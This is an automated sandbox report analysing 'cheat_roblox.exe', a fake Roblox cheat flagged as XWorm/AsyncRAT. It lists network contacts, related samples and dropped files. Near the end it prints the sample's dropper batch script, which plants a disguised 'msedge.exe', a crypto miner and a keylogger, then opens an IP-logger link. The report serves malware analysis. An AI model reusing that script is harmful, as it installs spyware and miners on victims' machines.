            a.nel.cloudflare.com | 35.190.80.1 | true | false |  | unknown
            edge-term4-ams2.roblox.com | 128.116.21.3 | true | false |  | unknown
            2no.co | 104.21.79.229 | true | false |  | unknown
            cdn.iplogger.org | 172.67.132.113 | true | false |  | unknown
            www.google.com | 142.250.186.100 | true | false |  | unknown
            d2v57ias1m20gl.cloudfront.net | 13.32.110.82 | true | false |  | unknown
            ecsv2.roblox.com | unknown | unknown | false |  | unknown
            client-telemetry.roblox.com | unknown | unknown | false |  | unknown
            clientsettingscdn.roblox.com | unknown | unknown | false |  | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://2no.co/24RXx6 | false |  | unknown
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 | false | Avira URL Cloud: safe | unknown
                                  https://carcostadvisor.besets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://salemovetravel.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://sapo.iosets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://wpext.plsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://welt.desets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://poalim.sitesets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://infoedgeindia.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.cert.fnmt.es/dpcs/RobloxPlayerInstaller.exe, 00000004.00000003.3810149194.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B6F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817719825.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807996527.0000000004B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://blackrockadvisorelite.itsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cognitive-ai.rusets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.accv.es00RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817388694.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805197288.0000000002928000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805306444.0000000002929000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cafemedia.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://thirdspace.org.ausets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://mercadoshops.com.arsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://smpn106jkt.sch.idsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://elpais.uysets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://landyrev.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://the42.iesets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://commentcamarche.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://tucarro.com.vesets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://rws3nvtvt.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://eleconomista.netsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://helpdesk.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.winimage.com/zLibDll1.2.11rbrcheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mercadolivre.com.brsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.firmaprofesional.com/cps0RobloxPlayerInstaller.exe, 00000004.00000003.3805712625.0000000004BAE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817867790.0000000004B9A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805883321.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805604637.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817937358.0000000004BB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://iplogger.org/chromecache_145.11.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://clmbtech.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
88.212.201.198 | unknown | Russian Federation | 39134 | UNITEDNETRU | false
128.116.21.3 | edge-term4-ams2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false
128.116.21.4 | unknown | United States | 22697 | ROBLOX-PRODUCTIONUS | false
104.21.79.229 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
172.67.132.113 | cdn.iplogger.org | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
142.250.186.100 | www.google.com | United States | 15169 | GOOGLEUS | false
88.212.201.204 | counter.yadro.ru | Russian Federation | 39134 | UNITEDNETRU | false
13.32.110.82 | d2v57ias1m20gl.cloudfront.net | United States | 16509 | AMAZON-02US | false
                                  IP
                                  192.168.2.7
                                  192.168.2.6
                                  127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1484385
Start date and time: 2024-07-30 00:55:41 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cheat_roblox.exe
Detection: MAL
Classification: mal52.troj.spyw.evad.winEXE@33/28@20/13
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 2.16.43.25, 142.250.185.78, 108.177.15.84, 216.58.212.131, 192.229.221.95, 34.104.35.123, 199.232.214.172, 216.58.212.163, 199.232.210.172, 23.51.111.252, 216.58.212.142, 142.250.185.163
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientsettingscdn.roblox.com.edgekey.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, e7229.f.akamaiedge.net, clients.l.google.com
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: cheat_roblox.exe
Time | Type | Description
18:57:17 | API Interceptor | 430280x Sleep call for process: RobloxPlayerInstaller.exe modified
                                  InputOutput
                                  URL: https://2no.co/24RXx6 Model: Perplexity: mixtral-8x7b-instruct
                                  {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as it does not use phrases such as 'click here to view document' or 'to view secured document click here'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism.","The webpage emphasizes the user's privacy, and provides a link to its privacy policy and terms & conditions, indicating a commitment to data protection."]}
                                  Title: Branded Short Domain OCR: *landshake We value your privacy This link was created by the user of URL Shortener Service IPLagger_ By clicking on this link, you can give your consent to the provision ot your personal data, SUCII as IP address, browser type anc operating system and other data, as well as using cookies to IPLogger, as well as to its partners and users. You can learn more about data processing and removing your data in IPLogger Privacy Policy. You can also follow this link without any data being recorded and processed. We value your privacy, that is why we are seeking your consent prior to collecting any Cata. Agree & Continue Ey clicking on "Agree & Continuer you egree with the Privazpolicy. I Terms &. Conditions For continue without consent click here 
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.21.79.229roblox cheat.exeGet hashmaliciousXWormBrowse
                                    C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                      lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                        setup.exeGet hashmaliciousUnknownBrowse
                                          setup.exeGet hashmaliciousUnknownBrowse
                                            Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                  setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                    Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                      88.212.201.198http://www.puusektori.fiGet hashmaliciousGRQ ScamBrowse
                                                      • counter.yadro.ru/hit;fims2?t38.6;r;s1280*1024*24;uhttp%3A//www.puusektori.fi/;hkuinka%20monta%20opintoviikkoa%20on%20ammatillisen%20perustutkinnon%20laajuus;0.6661644312023942
                                                      njw.exeGet hashmaliciousUnknownBrowse
                                                      • counter.yadro.ru/hit;counter1?r;s1280*1024*32;uhttp%3A//www.all-bearings.narod.ru/secondpage.html;0.5443641556055339
                                                      128.116.21.3roblox cheat.exeGet hashmaliciousXWormBrowse
                                                        roblox cheat.exeGet hashmaliciousXWormBrowse
                                                          Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                            128.116.21.4solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                              RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    counter.yadro.ruroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                    • 88.212.202.52
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.202.52
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 88.212.202.52
                                                                    http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                    • 88.212.201.198
                                                                    2no.coroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 104.21.79.229
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 172.67.149.76
                                                                    C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                    • 104.21.79.229
                                                                    lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.79.229
                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.79.229
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 172.67.149.76
                                                                    Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 104.21.79.229
                                                                    edge-term4-ams2.roblox.comroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.4
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                    • 128.116.21.4
                                                                    SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.21.3
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    UNITEDNETRUroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.198
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 88.212.201.204
                                                                    Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                    • 88.212.201.204
                                                                    http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                    • 88.212.202.52
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    • 88.212.201.204
                                                                    file.exeGet hashmaliciousXenoRATBrowse
                                                                    • 88.212.202.52
                                                                    ROBLOX-PRODUCTIONUSroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.4
                                                                    roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                    • 128.116.21.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.3
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                    • 128.116.123.4
                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\ msedge.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\ msedge.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | roblox cheat.exe | malicious | XWorm
                                                                            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3995
                                                                            Entropy (8bit):5.355780161863253
                                                                            Encrypted:false
                                                                            SSDEEP:96:qXsr8s8i8JuRdrbqNbSJ8JE1JEiJcgO24s55FJMH:q8r8s8i8J+dmUJ8JCJXJbJJs
                                                                            MD5:6920C83041459894F0469F4C24F2A6C8
                                                                            SHA1:B96D5A47F4606E8F15DE8B55B59773F75D727A73
                                                                            SHA-256:F06AEFB69965DFD61CBBDEB8FCAFD28AB3B0091900B748B2EEBD1788AB673482
                                                                            SHA-512:BC25D90F6DCFD90CBA5764BD8E46A27E54A70B2CF35CAE2332CE0528D7C58A6CE31C6362508ED33B6EF2D59D0C489921EFB252402720262358AC47533DC60DDA
                                                                            Malicious:false
                                                                            Reputation:low
Preview:
2024-07-29T22:56:32.670Z
2024-07-29T22:56:32.071Z,0.071638,031c,6,Info [FLog::DesktopInstaller] The installer reporter is initialized
2024-07-29T22:56:32.071Z,0.071703,031c,6,Info [FLog::DesktopInstaller] Reporting Installer Start
2024-07-29T22:56:33.037Z,1.037293,0f28,6,Critical [FLog::DesktopInstaller] failed Http POST url: https://client-telemetry.roblox.com, code: 11, message: HttpError: TlsVerificationFail, body 
2024-07-29T22:56:33.840Z,1.840217,091c,6,Info [FLog::DesktopInstaller] Start the Installer thread
2024-07-29T22:56:33.974Z,1.974350,091c,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal
2024-07-29T22:56:33.977Z,1.977791,091c,6,Info [FLog::DesktopInstaller] Fetch flag info
2024-07-29T22:56:34.642Z,2.642278,0f28,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: 
2024-07-29T22:57:20.263Z,48.263100,0f28,
                                                                            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):233235
                                                                            Entropy (8bit):6.025218023713329
                                                                            Encrypted:false
                                                                            SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                            MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                            SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                            SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                            SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                            Malicious:false
                                                                            Reputation:low
Preview:
##
## Bundle of CA Root Certificates
##
## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT
##
## This is a bundle of X.509 certificates of public Certificate Authorities
## (CA). These were automatically extracted from Mozilla's root certificates
## file (certdata.txt). This file can be found in the mozilla source tree:
## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt
##
## It contains the certificates in PEM format and therefore
## can be directly used with curl / libcurl / php_curl, or with
## an Apache+mod_ssl webserver for SSL client authentication.
## Just configure this file as the SSLCACertificateFile.
##
## Conversion done with mk-ca-bundle.pl version 1.29.
## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e
##


GlobalSign Root CA
==================
-----BEGIN CERTIFICATE-----
MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):166912
                                                                            Entropy (8bit):6.251413929646261
                                                                            Encrypted:false
                                                                            SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                            MD5:D653AEF66E218FB009B43365919BBCE3
                                                                            SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                            SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                            SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: roblox cheat.exe, Detection: malicious
• Filename: roblox cheat.exe, Detection: malicious
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):140288
                                                                            Entropy (8bit):5.566968845764678
                                                                            Encrypted:false
                                                                            SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                            MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                            SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                            SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                            SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: roblox cheat.exe, Detection: malicious
• Filename: roblox cheat.exe, Detection: malicious
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):168960
                                                                            Entropy (8bit):5.30703099621005
                                                                            Encrypted:false
                                                                            SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                            MD5:520E97797B27B752130B3E982953CEAF
                                                                            SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                            SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                            SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5720984
                                                                            Entropy (8bit):6.362394353465928
                                                                            Encrypted:false
                                                                            SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                            MD5:27469372591B14FF1C57654FACB5E020
                                                                            SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                            SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                            SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):477
                                                                            Entropy (8bit):5.082252715861135
                                                                            Encrypted:false
                                                                            SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5i1bhH0HR:ZMz0zsBiO4Z+O4ZOKoQR
                                                                            MD5:AAA81C149A8D65AC899AF053ECF582BC
                                                                            SHA1:A784DDE9304A2B8108180A652C9374BEF71500D9
                                                                            SHA-256:98818D1694AE946A32DEC4CAEA1FDD219650EF5A915CCA6A68E974C028A2FD69
                                                                            SHA-512:74B6B9A1EF22CE12E3CE5076C8A3B6D0BE1C52642C6E004D52255D23AFD3506496D84049CDF6F5E37F5238C5645E014E26D88046D196CDBD3DDA90B3A27BEA92
                                                                            Malicious:false
Preview:
%echo off
copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application
start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6
start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner
copy %temp%\Keyloger.exe %systemDrive%
start %systemDrive%\Keyloger.exe
start cmd
start https://2no.co/24RXx6
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2877728
                                                                            Entropy (8bit):6.868480682648069
                                                                            Encrypted:false
